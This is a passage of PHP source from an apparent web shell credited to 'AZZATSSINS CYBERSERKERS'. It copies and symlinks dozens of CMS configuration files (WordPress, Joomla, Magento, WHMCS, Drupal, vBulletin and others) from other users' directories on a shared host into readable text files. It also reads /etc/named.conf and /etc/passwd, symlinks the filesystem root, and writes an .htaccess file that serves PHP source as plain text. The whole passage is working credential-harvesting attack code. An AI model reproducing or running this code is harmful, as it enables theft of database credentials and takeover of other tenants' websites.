  1224. copy('/var/www/'.$user.'/html/config.php',$user.' <~ PHPNUKE.txt');
  1225. copy('/var/www/'.$user.'/conn.php',$user.' <~ OTHER.txt');
  1226. copy('/var/www/'.$user.'/inc/config.inc.php',$user.' <~ OTHER.txt');
  1227. copy('/var/www/'.$user.'/application/config/database.php',$user.' <~ OTHER.txt');
  1228. copy('/var/www/'.$user.'/application/config/database.php',$user.' <~ OTHER.txt');
  1229. copy('/var/www/'.$user.'/wp-config.php',$user.' <~ WORDPRESS.txt');
  1230. copy('/var/www/'.$user.'/wp-configuration.php',$user.' <~ JOOMLA.txt');
  1231. copy('/var/www/'.$user.'/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1232. copy('/var/www/'.$user.'/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  1233. copy('/var/www/'.$user.'/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  1234. copy('/var/www/'.$user.'/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  1235. /* AUTHOR : AZZATSSINS CYBERSERKERS */
  1236. copy('/var/www/'.$user.'/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  1237. copy('/var/www/'.$user.'/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  1238. copy('/var/www/'.$user.'/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  1239. copy('/var/www/'.$user.'/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  1240. copy('/var/www/'.$user.'/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  1241. copy('/var/www/'.$user.'/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1242. copy('/var/www/'.$user.'/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  1243. copy('/var/www/'.$user.'/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  1244. copy('/var/www/'.$user.'/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  1245. copy('/var/www/'.$user.'/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  1246. copy('/var/www/'.$user.'/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  1247. copy('/var/www/'.$user.'/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  1248. copy('/var/www/'.$user.'/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  1249. copy('/var/www/'.$user.'/blog/configuration.php',$user.' <~ JOOMLA.txt');
  1250. copy('/var/www/'.$user.'/submitticket.php',$user.' <~ WHMCS.txt');
  1251. copy('/var/www/'.$user.'/cms/configuration.php',$user.' <~ JOOMLA.txt');
  1252. copy('/var/www/'.$user.'/beta/configuration.php',$user.' <~ JOOMLA.txt');
  1253. copy('/var/www/'.$user.'/portal/configuration.php',$user.' <~ JOOMLA.txt');
  1254. copy('/var/www/'.$user.'/site/configuration.php',$user.' <~ JOOMLA.txt');
  1255. copy('/var/www/'.$user.'/main/configuration.php',$user.' <~ JOOMLA.txt');
  1256. copy('/var/www/'.$user.'/home/configuration.php',$user.' <~ JOOMLA.txt');
  1257. copy('/var/www/'.$user.'/demo/configuration.php',$user.' <~ JOOMLA.txt');
  1258. copy('/var/www/'.$user.'/test/configuration.php',$user.' <~ JOOMLA.txt');
  1259. copy('/var/www/'.$user.'/v1/configuration.php',$user.' <~ JOOMLA.txt');
  1260. copy('/var/www/'.$user.'/v2/configuration.php',$user.' <~ JOOMLA.txt');
  1261. copy('/var/www/'.$user.'/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  1262. copy('/var/www/'.$user.'/new/configuration.php',$user.' <~ JOOMLA.txt');
  1263. copy('/var/www/'.$user.'/app/etc/local.xml',$user.' <~ MAGENTO.txt');
  1264. copy('/var/www/'.$user.'/html/html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  1265. copy('/var/www/'.$user.'/html/application/config/database.php',$user.' <~ ELLISLAB.txt');
  1266. copy('/var/www/'.$user.'/html/admin/config.php',$user.' <~ OPENCART.txt');
  1267. copy('/var/www/'.$user.'/html/sites/default/settings.php',$user.' <~ DRUPAL.txt');
  1268. copy('/var/www/'.$user.'/html/forum/config.php',$user.' <~ PHPBB.txt');
  1269. copy('/var/www/'.$user.'/html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  1270. copy('/var/www/'.$user.'/html/includes/config.php',$user.' <~ VBULLETIN.txt');
  1271. copy('/var/www/'.$user.'/html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  1272. copy('/var/www/'.$user.'/html/config.php',$user.' <~ OTHER.txt');
  1273. copy('/var/www/'.$user.'/html/html/config.php',$user.' <~ PHPNUKE.txt');
  1274. copy('/var/www/'.$user.'/html/conn.php',$user.' <~ OTHER.txt');
  1275. copy('/var/www/'.$user.'/html/inc/config.inc.php',$user.' <~ OTHER.txt');
  1276. copy('/var/www/'.$user.'/html/application/config/database.php',$user.' <~ OTHER.txt');
  1277. copy('/var/www/'.$user.'/html/application/config/database.php',$user.' <~ OTHER.txt');
  1278. copy('/var/www/'.$user.'/html/wp-config.php',$user.' <~ WORDPRESS.txt');
  1279. copy('/var/www/'.$user.'/html/wp-configuration.php',$user.' <~ JOOMLA.txt');
  1280. copy('/var/www/'.$user.'/html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1281. copy('/var/www/'.$user.'/html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  1282. copy('/var/www/'.$user.'/html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  1283. copy('/var/www/'.$user.'/html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  1284. /* AUTHOR : AZZATSSINS CYBERSERKERS */
  1285. copy('/var/www/'.$user.'/html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  1286. copy('/var/www/'.$user.'/html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  1287. copy('/var/www/'.$user.'/html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  1288. copy('/var/www/'.$user.'/html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  1289. copy('/var/www/'.$user.'/html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  1290. copy('/var/www/'.$user.'/html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1291. copy('/var/www/'.$user.'/html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  1292. copy('/var/www/'.$user.'/html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  1293. copy('/var/www/'.$user.'/html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  1294. copy('/var/www/'.$user.'/html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  1295. copy('/var/www/'.$user.'/html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  1296. copy('/var/www/'.$user.'/html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  1297. copy('/var/www/'.$user.'/html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  1298. copy('/var/www/'.$user.'/html/blog/configuration.php',$user.' <~ JOOMLA.txt');
  1299. copy('/var/www/'.$user.'/html/submitticket.php',$user.' <~ WHMCS.txt');
  1300. copy('/var/www/'.$user.'/html/cms/configuration.php',$user.' <~ JOOMLA.txt');
  1301. copy('/var/www/'.$user.'/html/beta/configuration.php',$user.' <~ JOOMLA.txt');
  1302. copy('/var/www/'.$user.'/html/portal/configuration.php',$user.' <~ JOOMLA.txt');
  1303. copy('/var/www/'.$user.'/html/site/configuration.php',$user.' <~ JOOMLA.txt');
  1304. copy('/var/www/'.$user.'/html/main/configuration.php',$user.' <~ JOOMLA.txt');
  1305. copy('/var/www/'.$user.'/html/home/configuration.php',$user.' <~ JOOMLA.txt');
  1306. copy('/var/www/'.$user.'/html/demo/configuration.php',$user.' <~ JOOMLA.txt');
  1307. copy('/var/www/'.$user.'/html/test/configuration.php',$user.' <~ JOOMLA.txt');
  1308. copy('/var/www/'.$user.'/html/v1/configuration.php',$user.' <~ JOOMLA.txt');
  1309. copy('/var/www/'.$user.'/html/v2/configuration.php',$user.' <~ JOOMLA.txt');
  1310. copy('/var/www/'.$user.'/html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  1311. copy('/var/www/'.$user.'/html/new/configuration.php',$user.' <~ JOOMLA.txt');
  1312. copy('/var/www/'.$user.'/html/app/etc/local.xml',$user.' <~ MAGENTO.txt');
  1313. symlink('/var/www/vhosts/'.$user.'/html/application/config/database.php',$user.' <~ ELLISLAB.txt');
  1314. symlink('/var/www/vhosts/'.$user.'/html/admin/config.php',$user.' <~ OPENCART.txt');
  1315. symlink('/var/www/vhosts/'.$user.'/html/sites/default/settings.php',$user.' <~ DRUPAL.txt');
  1316. symlink('/var/www/vhosts/'.$user.'/html/forum/config.php',$user.' <~ PHPBB.txt');
  1317. symlink('/var/www/vhosts/'.$user.'/html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  1318. symlink('/var/www/vhosts/'.$user.'/html/includes/config.php',$user.' <~ VBULLETIN.txt');
  1319. symlink('/var/www/vhosts/'.$user.'/html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  1320. symlink('/var/www/vhosts/'.$user.'/html/config.php',$user.' <~ OTHER.txt');
  1321. symlink('/var/www/vhosts/'.$user.'/html/html/config.php',$user.' <~ PHPNUKE.txt');
  1322. symlink('/var/www/vhosts/'.$user.'/html/conn.php',$user.' <~ OTHER.txt');
  1323. symlink('/var/www/vhosts/'.$user.'/html/inc/config.inc.php',$user.' <~ OTHER.txt');
  1324. copy('/var/www/vhosts/'.$user.'/html/application/config/database.php',$user.' <~ OTHER.txt');
  1325. symlink('/var/www/vhosts/'.$user.'/html/application/config/database.php',$user.' <~ OTHER.txt');
  1326. symlink('/var/www/vhosts/'.$user.'/html/wp-config.php',$user.' <~ WORDPRESS.txt');
  1327. symlink('/var/www/vhosts/'.$user.'/html/wp-configuration.php',$user.' <~ JOOMLA.txt');
  1328. symlink('/var/www/vhosts/'.$user.'/html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1329. symlink('/var/www/vhosts/'.$user.'/html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  1330. symlink('/var/www/vhosts/'.$user.'/html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  1331. symlink('/var/www/vhosts/'.$user.'/html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  1332. /* AUTHOR : AZZATSSINS CYBERSERKERS */
  1333. symlink('/var/www/vhosts/'.$user.'/html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  1334. symlink('/var/www/vhosts/'.$user.'/html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  1335. symlink('/var/www/vhosts/'.$user.'/html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  1336. symlink('/var/www/vhosts/'.$user.'/html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  1337. symlink('/var/www/vhosts/'.$user.'/html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  1338. symlink('/var/www/vhosts/'.$user.'/html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1339. symlink('/var/www/vhosts/'.$user.'/html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  1340. symlink('/var/www/vhosts/'.$user.'/html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  1341. symlink('/var/www/vhosts/'.$user.'/html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  1342. symlink('/var/www/vhosts/'.$user.'/html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  1343. symlink('/var/www/vhosts/'.$user.'/html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  1344. symlink('/var/www/vhosts/'.$user.'/html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  1345. symlink('/var/www/vhosts/'.$user.'/html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  1346. symlink('/var/www/vhosts/'.$user.'/html/blog/configuration.php',$user.' <~ JOOMLA.txt');
  1347. symlink('/var/www/vhosts/'.$user.'/html/submitticket.php',$user.' <~ WHMCS.txt');
  1348. symlink('/var/www/vhosts/'.$user.'/html/cms/configuration.php',$user.' <~ JOOMLA.txt');
  1349. symlink('/var/www/vhosts/'.$user.'/html/beta/configuration.php',$user.' <~ JOOMLA.txt');
  1350. symlink('/var/www/vhosts/'.$user.'/html/portal/configuration.php',$user.' <~ JOOMLA.txt');
  1351. symlink('/var/www/vhosts/'.$user.'/html/site/configuration.php',$user.' <~ JOOMLA.txt');
  1352. symlink('/var/www/vhosts/'.$user.'/html/main/configuration.php',$user.' <~ JOOMLA.txt');
  1353. symlink('/var/www/vhosts/'.$user.'/html/home/configuration.php',$user.' <~ JOOMLA.txt');
  1354. symlink('/var/www/vhosts/'.$user.'/html/demo/configuration.php',$user.' <~ JOOMLA.txt');
  1355. symlink('/var/www/vhosts/'.$user.'/html/test/configuration.php',$user.' <~ JOOMLA.txt');
  1356. symlink('/var/www/vhosts/'.$user.'/html/v1/configuration.php',$user.' <~ JOOMLA.txt');
  1357. symlink('/var/www/vhosts/'.$user.'/html/v2/configuration.php',$user.' <~ JOOMLA.txt');
  1358. symlink('/var/www/vhosts/'.$user.'/html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  1359. symlink('/var/www/vhosts/'.$user.'/html/new/configuration.php',$user.' <~ JOOMLA.txt');
  1360. symlink('/var/www/vhosts/'.$user.'/html/app/etc/local.xml',$user.' <~ MAGENTO.txt');
  1361. symlink('/var/www/vhosts/'.$user.'/html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  1362. symlink('/var/www/vhosts/'.$user.'/application/config/database.php',$user.' <~ ELLISLAB.txt');
  1363. symlink('/var/www/vhosts/'.$user.'/admin/config.php',$user.' <~ OPENCART.txt');
  1364. symlink('/var/www/vhosts/'.$user.'/sites/default/settings.php',$user.' <~ DRUPAL.txt');
  1365. symlink('/var/www/vhosts/'.$user.'/forum/config.php',$user.' <~ PHPBB.txt');
  1366. symlink('/var/www/vhosts/'.$user.'/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  1367. symlink('/var/www/vhosts/'.$user.'/includes/config.php',$user.' <~ VBULLETIN.txt');
  1368. symlink('/var/www/vhosts/'.$user.'/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  1369. symlink('/var/www/vhosts/'.$user.'/config.php',$user.' <~ OTHER.txt');
  1370. symlink('/var/www/vhosts/'.$user.'/html/config.php',$user.' <~ PHPNUKE.txt');
  1371. symlink('/var/www/vhosts/'.$user.'/conn.php',$user.' <~ OTHER.txt');
  1372. symlink('/var/www/vhosts/'.$user.'/inc/config.inc.php',$user.' <~ OTHER.txt');
  1373. copy('/var/www/vhosts/'.$user.'/application/config/database.php',$user.' <~ OTHER.txt');
  1374. symlink('/var/www/vhosts/'.$user.'/application/config/database.php',$user.' <~ OTHER.txt');
  1375. symlink('/var/www/vhosts/'.$user.'/wp-config.php',$user.' <~ WORDPRESS.txt');
  1376. symlink('/var/www/vhosts/'.$user.'/wp-configuration.php',$user.' <~ JOOMLA.txt');
  1377. symlink('/var/www/vhosts/'.$user.'/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1378. symlink('/var/www/vhosts/'.$user.'/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  1379. symlink('/var/www/vhosts/'.$user.'/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  1380. symlink('/var/www/vhosts/'.$user.'/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  1381. /* AUTHOR : AZZATSSINS CYBERSERKERS */
  1382. symlink('/var/www/vhosts/'.$user.'/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  1383. symlink('/var/www/vhosts/'.$user.'/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  1384. symlink('/var/www/vhosts/'.$user.'/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  1385. symlink('/var/www/vhosts/'.$user.'/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  1386. symlink('/var/www/vhosts/'.$user.'/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  1387. symlink('/var/www/vhosts/'.$user.'/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1388. symlink('/var/www/vhosts/'.$user.'/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  1389. symlink('/var/www/vhosts/'.$user.'/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  1390. symlink('/var/www/vhosts/'.$user.'/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  1391. symlink('/var/www/vhosts/'.$user.'/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  1392. symlink('/var/www/vhosts/'.$user.'/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  1393. symlink('/var/www/vhosts/'.$user.'/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  1394. symlink('/var/www/vhosts/'.$user.'/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  1395. symlink('/var/www/vhosts/'.$user.'/blog/configuration.php',$user.' <~ JOOMLA.txt');
  1396. symlink('/var/www/vhosts/'.$user.'/submitticket.php',$user.' <~ WHMCS.txt');
  1397. symlink('/var/www/vhosts/'.$user.'/cms/configuration.php',$user.' <~ JOOMLA.txt');
  1398. symlink('/var/www/vhosts/'.$user.'/beta/configuration.php',$user.' <~ JOOMLA.txt');
  1399. symlink('/var/www/vhosts/'.$user.'/portal/configuration.php',$user.' <~ JOOMLA.txt');
  1400. symlink('/var/www/vhosts/'.$user.'/site/configuration.php',$user.' <~ JOOMLA.txt');
  1401. symlink('/var/www/vhosts/'.$user.'/main/configuration.php',$user.' <~ JOOMLA.txt');
  1402. symlink('/var/www/vhosts/'.$user.'/home/configuration.php',$user.' <~ JOOMLA.txt');
  1403. symlink('/var/www/vhosts/'.$user.'/demo/configuration.php',$user.' <~ JOOMLA.txt');
  1404. symlink('/var/www/vhosts/'.$user.'/test/configuration.php',$user.' <~ JOOMLA.txt');
  1405. symlink('/var/www/vhosts/'.$user.'/v1/configuration.php',$user.' <~ JOOMLA.txt');
  1406. symlink('/var/www/vhosts/'.$user.'/v2/configuration.php',$user.' <~ JOOMLA.txt');
  1407. symlink('/var/www/vhosts/'.$user.'/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  1408. symlink('/var/www/vhosts/'.$user.'/new/configuration.php',$user.' <~ JOOMLA.txt');
  1409. symlink('/var/www/vhosts/'.$user.'/app/etc/local.xml',$user.' <~ MAGENTO.txt');
  1410. symlink('/var/www/vhosts/'.$user.'/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  1411. symlink('/var/www/'.$user.'/html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  1412. symlink('/var/www/'.$user.'/application/config/database.php',$user.' <~ ELLISLAB.txt');
  1413. symlink('/var/www/'.$user.'/admin/config.php',$user.' <~ OPENCART.txt');
  1414. symlink('/var/www/'.$user.'/sites/default/settings.php',$user.' <~ DRUPAL.txt');
  1415. symlink('/var/www/'.$user.'/forum/config.php',$user.' <~ PHPBB.txt');
  1416. symlink('/var/www/'.$user.'/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  1417. symlink('/var/www/'.$user.'/includes/config.php',$user.' <~ VBULLETIN.txt');
  1418. symlink('/var/www/'.$user.'/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  1419. symlink('/var/www/'.$user.'/config.php',$user.' <~ OTHER.txt');
  1420. symlink('/var/www/'.$user.'/html/config.php',$user.' <~ PHPNUKE.txt');
  1421. symlink('/var/www/'.$user.'/conn.php',$user.' <~ OTHER.txt');
  1422. symlink('/var/www/'.$user.'/inc/config.inc.php',$user.' <~ OTHER.txt');
  1423. copy('/var/www/'.$user.'/application/config/database.php',$user.' <~ OTHER.txt');
  1424. symlink('/var/www/'.$user.'/application/config/database.php',$user.' <~ OTHER.txt');
  1425. symlink('/var/www/'.$user.'/wp-config.php',$user.' <~ WORDPRESS.txt');
  1426. symlink('/var/www/'.$user.'/wp-configuration.php',$user.' <~ JOOMLA.txt');
  1427. symlink('/var/www/'.$user.'/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1428. symlink('/var/www/'.$user.'/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  1429. symlink('/var/www/'.$user.'/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  1430. symlink('/var/www/'.$user.'/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  1431. /* AUTHOR : AZZATSSINS CYBERSERKERS */
  1432. symlink('/var/www/'.$user.'/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  1433. symlink('/var/www/'.$user.'/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  1434. symlink('/var/www/'.$user.'/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  1435. symlink('/var/www/'.$user.'/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  1436. symlink('/var/www/'.$user.'/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  1437. symlink('/var/www/'.$user.'/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1438. symlink('/var/www/'.$user.'/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  1439. symlink('/var/www/'.$user.'/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  1440. symlink('/var/www/'.$user.'/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  1441. symlink('/var/www/'.$user.'/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  1442. symlink('/var/www/'.$user.'/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  1443. symlink('/var/www/'.$user.'/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  1444. symlink('/var/www/'.$user.'/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  1445. symlink('/var/www/'.$user.'/blog/configuration.php',$user.' <~ JOOMLA.txt');
  1446. symlink('/var/www/'.$user.'/submitticket.php',$user.' <~ WHMCS.txt');
  1447. symlink('/var/www/'.$user.'/cms/configuration.php',$user.' <~ JOOMLA.txt');
  1448. symlink('/var/www/'.$user.'/beta/configuration.php',$user.' <~ JOOMLA.txt');
  1449. symlink('/var/www/'.$user.'/portal/configuration.php',$user.' <~ JOOMLA.txt');
  1450. symlink('/var/www/'.$user.'/site/configuration.php',$user.' <~ JOOMLA.txt');
  1451. symlink('/var/www/'.$user.'/main/configuration.php',$user.' <~ JOOMLA.txt');
  1452. symlink('/var/www/'.$user.'/home/configuration.php',$user.' <~ JOOMLA.txt');
  1453. symlink('/var/www/'.$user.'/demo/configuration.php',$user.' <~ JOOMLA.txt');
  1454. symlink('/var/www/'.$user.'/test/configuration.php',$user.' <~ JOOMLA.txt');
  1455. symlink('/var/www/'.$user.'/v1/configuration.php',$user.' <~ JOOMLA.txt');
  1456. symlink('/var/www/'.$user.'/v2/configuration.php',$user.' <~ JOOMLA.txt');
  1457. symlink('/var/www/'.$user.'/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  1458. symlink('/var/www/'.$user.'/new/configuration.php',$user.' <~ JOOMLA.txt');
  1459. symlink('/var/www/'.$user.'/app/etc/local.xml',$user.' <~ MAGENTO.txt');
  1460. symlink('/var/www/'.$user.'/html/html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  1461. symlink('/var/www/'.$user.'/html/application/config/database.php',$user.' <~ ELLISLAB.txt');
  1462. symlink('/var/www/'.$user.'/html/admin/config.php',$user.' <~ OPENCART.txt');
  1463. symlink('/var/www/'.$user.'/html/sites/default/settings.php',$user.' <~ DRUPAL.txt');
  1464. symlink('/var/www/'.$user.'/html/forum/config.php',$user.' <~ PHPBB.txt');
  1465. symlink('/var/www/'.$user.'/html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  1466. symlink('/var/www/'.$user.'/html/includes/config.php',$user.' <~ VBULLETIN.txt');
  1467. symlink('/var/www/'.$user.'/html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  1468. symlink('/var/www/'.$user.'/html/config.php',$user.' <~ OTHER.txt');
  1469. symlink('/var/www/'.$user.'/html/html/config.php',$user.' <~ PHPNUKE.txt');
  1470. symlink('/var/www/'.$user.'/html/conn.php',$user.' <~ OTHER.txt');
  1471. symlink('/var/www/'.$user.'/html/inc/config.inc.php',$user.' <~ OTHER.txt');
  1472. copy('/var/www/'.$user.'/html/application/config/database.php',$user.' <~ OTHER.txt');
  1473. symlink('/var/www/'.$user.'/html/application/config/database.php',$user.' <~ OTHER.txt');
  1474. symlink('/var/www/'.$user.'/html/wp-config.php',$user.' <~ WORDPRESS.txt');
  1475. symlink('/var/www/'.$user.'/html/wp-configuration.php',$user.' <~ JOOMLA.txt');
  1476. symlink('/var/www/'.$user.'/html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1477. symlink('/var/www/'.$user.'/html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  1478. symlink('/var/www/'.$user.'/html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  1479. symlink('/var/www/'.$user.'/html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  1480. /* AUTHOR : AZZATSSINS CYBERSERKERS */
  1481. symlink('/var/www/'.$user.'/html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  1482. symlink('/var/www/'.$user.'/html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  1483. symlink('/var/www/'.$user.'/html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  1484. symlink('/var/www/'.$user.'/html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  1485. symlink('/var/www/'.$user.'/html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  1486. symlink('/var/www/'.$user.'/html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1487. symlink('/var/www/'.$user.'/html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  1488. symlink('/var/www/'.$user.'/html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  1489. symlink('/var/www/'.$user.'/html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  1490. symlink('/var/www/'.$user.'/html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  1491. symlink('/var/www/'.$user.'/html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  1492. symlink('/var/www/'.$user.'/html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  1493. symlink('/var/www/'.$user.'/html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  1494. symlink('/var/www/'.$user.'/html/blog/configuration.php',$user.' <~ JOOMLA.txt');
  1495. symlink('/var/www/'.$user.'/html/submitticket.php',$user.' <~ WHMCS.txt');
  1496. symlink('/var/www/'.$user.'/html/cms/configuration.php',$user.' <~ JOOMLA.txt');
  1497. symlink('/var/www/'.$user.'/html/beta/configuration.php',$user.' <~ JOOMLA.txt');
  1498. symlink('/var/www/'.$user.'/html/portal/configuration.php',$user.' <~ JOOMLA.txt');
  1499. symlink('/var/www/'.$user.'/html/site/configuration.php',$user.' <~ JOOMLA.txt');
  1500. symlink('/var/www/'.$user.'/html/main/configuration.php',$user.' <~ JOOMLA.txt');
  1501. symlink('/var/www/'.$user.'/html/home/configuration.php',$user.' <~ JOOMLA.txt');
  1502. symlink('/var/www/'.$user.'/html/demo/configuration.php',$user.' <~ JOOMLA.txt');
  1503. symlink('/var/www/'.$user.'/html/test/configuration.php',$user.' <~ JOOMLA.txt');
  1504. symlink('/var/www/'.$user.'/html/v1/configuration.php',$user.' <~ JOOMLA.txt');
  1505. symlink('/var/www/'.$user.'/html/v2/configuration.php',$user.' <~ JOOMLA.txt');
  1506. symlink('/var/www/'.$user.'/html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  1507. symlink('/var/www/'.$user.'/html/new/configuration.php',$user.' <~ JOOMLA.txt');
  1508. symlink('/var/www/'.$user.'/html/app/etc/local.xml',$user.' <~ MAGENTO.txt');
  1509.  
  1510. }
  1511. echo '<br><center><i><b><a href='.$xAzzatssinSx.'>CLICK ON HERE TO VIEW CONFIGS</a></b></i></center>';
  1512. }
  1513. }
  1514. if($_GET['symbolic']=="link"){
  1515. $d0mains = @file("/etc/named.conf");
  1516. ##httaces
  1517. if($d0mains){
  1518. @mkdir("symlink",0777);
  1519. @chdir("symlink");
  1520. @exe("ln -s / root");
  1521. $file3 = 'Options Indexes FollowSymLinks
  1522. DirectoryIndex AZZATSSINS.htm
  1523. AddType text/plain .php
  1524. AddHandler text/plain .php
  1525. Satisfy Any';
  1526. $fp3 = fopen('.htaccess','w');
  1527. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1528. echo "
  1529. <table align=center border=1 style='width:60%;border-color:#333333;'>
  1530. <tr>
  1531. <td align=center><font size=2>S. No.</font></td>
  1532. <td align=center><font size=2>Domains</font></td>
  1533. <td align=center><font size=2>Users</font></td>
  1534. <td align=center><font size=2>Symlink</font></td>
  1535. </tr>";
  1536. $dcount = 1;
  1537. foreach($d0mains as $d0main){
  1538. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1539. flush();
  1540. if(strlen(trim($domains[1][0])) > 2){
  1541. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1542. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  1543. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  1544. <td>".$user['name']."</td>
  1545. <td><a href='symlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  1546. flush();
  1547. $dcount++;}}}
  1548. echo "</table>";
  1549. }else{
  1550. $TEST=@file('/etc/passwd');
  1551. if ($TEST){
  1552. @mkdir("symlink",0777);
  1553. @chdir("symlink");
  1554. exe("ln -s / root");
  1555. $file3 = 'Options Indexes FollowSymLinks
